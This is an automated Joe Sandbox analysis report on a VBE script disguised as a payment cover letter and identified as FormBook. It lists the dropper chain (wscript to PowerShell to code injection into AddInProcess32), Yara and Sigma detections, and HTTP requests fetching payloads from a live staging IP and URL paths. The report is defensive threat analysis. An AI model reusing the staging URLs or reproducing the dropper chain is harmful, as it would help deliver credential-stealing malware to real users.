Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
01_COVER_LETTER_-_FOR_E_PAYMENT.vbe

Overview

General Information

Sample name:01_COVER_LETTER_-_FOR_E_PAYMENT.vbe
Analysis ID:1501321
MD5:46a86b1e4d1136f04743b65d4c402b9f
SHA1:dc17d6fa8bdd838bf37efbbe60b8a169e3f794a3
SHA256:db7c3bb3fa1311b696574ba3048e627b3ce3298d911a5946972655433be476af
Tags:Paymentvbe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Injects a PE file into a foreign processes
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5716 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01_COVER_LETTER_-_FOR_E_PAYMENT.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 6776 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\mBUojysElnsNYdM.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5960 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 1916 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • wermgr.exe (PID: 6292 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5960" "2556" "2808" "2640" "0" "0" "2560" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 5264 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 2364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • wermgr.exe (PID: 3320 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5264" "2560" "2180" "2464" "0" "0" "2640" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 2056 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 2524 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • wermgr.exe (PID: 5932 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2056" "2800" "2732" "2804" "0" "0" "2808" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 3780 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 5200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • wermgr.exe (PID: 7060 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3780" "2612" "2844" "2596" "0" "0" "2508" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 5256 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 4160 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • wermgr.exe (PID: 6048 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5256" "2508" "2512" "2556" "0" "0" "2560" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 5368 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 1352 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • wermgr.exe (PID: 2016 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5368" "2468" "2228" "2508" "0" "0" "2496" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 6068 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 884 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • wermgr.exe (PID: 1576 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6068" "2816" "2752" "2820" "0" "0" "2824" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 1596 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 1952 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • wermgr.exe (PID: 1280 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1596" "2640" "2808" "2340" "0" "0" "2572" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 4392 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 7060 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • wermgr.exe (PID: 4900 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4392" "2800" "2312" "2804" "0" "0" "2808" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 6780 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 936 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • wermgr.exe (PID: 3564 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6780" "2824" "2552" "2828" "0" "0" "2832" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f243:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17272:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.2428974827.0000000001710000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.2428974827.0000000001710000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bdd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.AddInProcess32.exe.db0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        5.2.AddInProcess32.exe.db0000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2e443:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x16472:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        5.2.AddInProcess32.exe.db0000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.AddInProcess32.exe.db0000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f243:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17272:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

          Other

          SourceRuleDescriptionAuthorStrings
          amsi64_5960.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xc137:$b2: ::FromBase64String(
          • 0xbda3:$s1: -join
          • 0xc14b:$s1: -join
          • 0x554f:$s4: +=
          • 0x5611:$s4: +=
          • 0x9838:$s4: +=
          • 0xb955:$s4: +=
          • 0xbc3f:$s4: +=
          • 0xbd85:$s4: +=
          • 0xe338:$s4: +=
          • 0xe3b8:$s4: +=
          • 0xe47e:$s4: +=
          • 0xe4fe:$s4: +=
          • 0xe6d4:$s4: +=
          • 0xe758:$s4: +=
          • 0xff6e:$s4: +=
          • 0xffee:$s4: +=
          • 0x100b4:$s4: +=
          • 0x10134:$s4: +=
          • 0x1030a:$s4: +=
          • 0x1038e:$s4: +=
          amsi64_5264.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xc137:$b2: ::FromBase64String(
          • 0xbda3:$s1: -join
          • 0xc14b:$s1: -join
          • 0x554f:$s4: +=
          • 0x5611:$s4: +=
          • 0x9838:$s4: +=
          • 0xb955:$s4: +=
          • 0xbc3f:$s4: +=
          • 0xbd85:$s4: +=
          • 0xe338:$s4: +=
          • 0xe3b8:$s4: +=
          • 0xe47e:$s4: +=
          • 0xe4fe:$s4: +=
          • 0xe6d4:$s4: +=
          • 0xe758:$s4: +=
          • 0xc55f:$e4: Get-WmiObject
          • 0xc74e:$e4: Get-Process
          • 0xc7a6:$e4: Start-Process
          amsi64_2056.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xc137:$b2: ::FromBase64String(
          • 0xbda3:$s1: -join
          • 0xc14b:$s1: -join
          • 0x554f:$s4: +=
          • 0x5611:$s4: +=
          • 0x9838:$s4: +=
          • 0xb955:$s4: +=
          • 0xbc3f:$s4: +=
          • 0xbd85:$s4: +=
          • 0xe338:$s4: +=
          • 0xe3b8:$s4: +=
          • 0xe47e:$s4: +=
          • 0xe4fe:$s4: +=
          • 0xe6d4:$s4: +=
          • 0xe758:$s4: +=
          • 0xff6e:$s4: +=
          • 0xffee:$s4: +=
          • 0x100b4:$s4: +=
          • 0x10134:$s4: +=
          • 0x1030a:$s4: +=
          • 0x1038e:$s4: +=
          amsi64_3780.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xc137:$b2: ::FromBase64String(
          • 0xbda3:$s1: -join
          • 0xc14b:$s1: -join
          • 0x554f:$s4: +=
          • 0x5611:$s4: +=
          • 0x9838:$s4: +=
          • 0xb955:$s4: +=
          • 0xbc3f:$s4: +=
          • 0xbd85:$s4: +=
          • 0xe338:$s4: +=
          • 0xe3b8:$s4: +=
          • 0xe47e:$s4: +=
          • 0xe4fe:$s4: +=
          • 0xe6d4:$s4: +=
          • 0xe758:$s4: +=
          • 0xc55f:$e4: Get-WmiObject
          • 0xc74e:$e4: Get-Process
          • 0xc7a6:$e4: Start-Process
          amsi64_5256.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xc137:$b2: ::FromBase64String(
          • 0xbda3:$s1: -join
          • 0xc14b:$s1: -join
          • 0x554f:$s4: +=
          • 0x5611:$s4: +=
          • 0x9838:$s4: +=
          • 0xb955:$s4: +=
          • 0xbc3f:$s4: +=
          • 0xbd85:$s4: +=
          • 0xe338:$s4: +=
          • 0xe3b8:$s4: +=
          • 0xe47e:$s4: +=
          • 0xe4fe:$s4: +=
          • 0xe6d4:$s4: +=
          • 0xe758:$s4: +=
          • 0xff6e:$s4: +=
          • 0xffee:$s4: +=
          • 0x100b4:$s4: +=
          • 0x10134:$s4: +=
          • 0x1030a:$s4: +=
          • 0x1038e:$s4: +=
          Click to see the 5 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Script Initiated Connection to Non-Local Network
          Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5716, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49710
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01_COVER_LETTER_-_FOR_E_PAYMENT.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01_COVER_LETTER_-_FOR_E_PAYMENT.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01_COVER_LETTER_-_FOR_E_PAYMENT.vbe", ProcessId: 5716, ProcessName: wscript.exe
          Sigma detected: WScript or CScript Dropper - File
          Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5716, TargetFilename: C:\Users\user\AppData\Roaming\mBUojysElnsNYdM.vbs
          Sigma detected: Script Initiated Connection
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5716, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49710
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01_COVER_LETTER_-_FOR_E_PAYMENT.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01_COVER_LETTER_-_FOR_E_PAYMENT.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01_COVER_LETTER_-_FOR_E_PAYMENT.vbe", ProcessId: 5716, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\mBUojysElnsNYdM.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6776, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 5960, ProcessName: powershell.exe

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: 01_COVER_LETTER_-_FOR_E_PAYMENT.vbeReversingLabs: Detection: 13%
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.db0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.db0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2428974827.0000000001710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 144.91.79.54 80Jump to behavior
          Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
          Source: global trafficHTTP traffic detected: GET /2508/s HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
          Source: global trafficHTTP traffic detected: GET /2508/r HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
          Source: global trafficHTTP traffic detected: GET /2508/u9icZZB5Fm5owWojnw5Q.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
          Source: global trafficHTTP traffic detected: GET /2508/v HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
          Source: global trafficHTTP traffic detected: GET /2508/file HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
          Source: global trafficHTTP traffic detected: GET /2508/s HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
          Source: global trafficHTTP traffic detected: GET /2508/r HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
          Source: global trafficHTTP traffic detected: GET /2508/u9icZZB5Fm5owWojnw5Q.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
          Source: global trafficHTTP traffic detected: GET /2508/v HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
          Source: global trafficHTTP traffic detected: GET /2508/file HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
          Source: wscript.exe, 00000000.00000003.2142682570.0000021315A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/
          Source: wscript.exe, 00000000.00000003.2165501956.000002131774A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2163830069.0000021315A96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168732062.0000021317750000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166376752.0000021317D42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165814195.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2167359857.0000021315AAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2163901569.0000021315AAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/file
          Source: wscript.exe, 00000000.00000003.2167136542.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168475689.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165814195.0000021315A25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/file140B807A6BN
          Source: wscript.exe, 00000000.00000003.2167136542.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168475689.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165814195.0000021315A25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/file53C7849C57
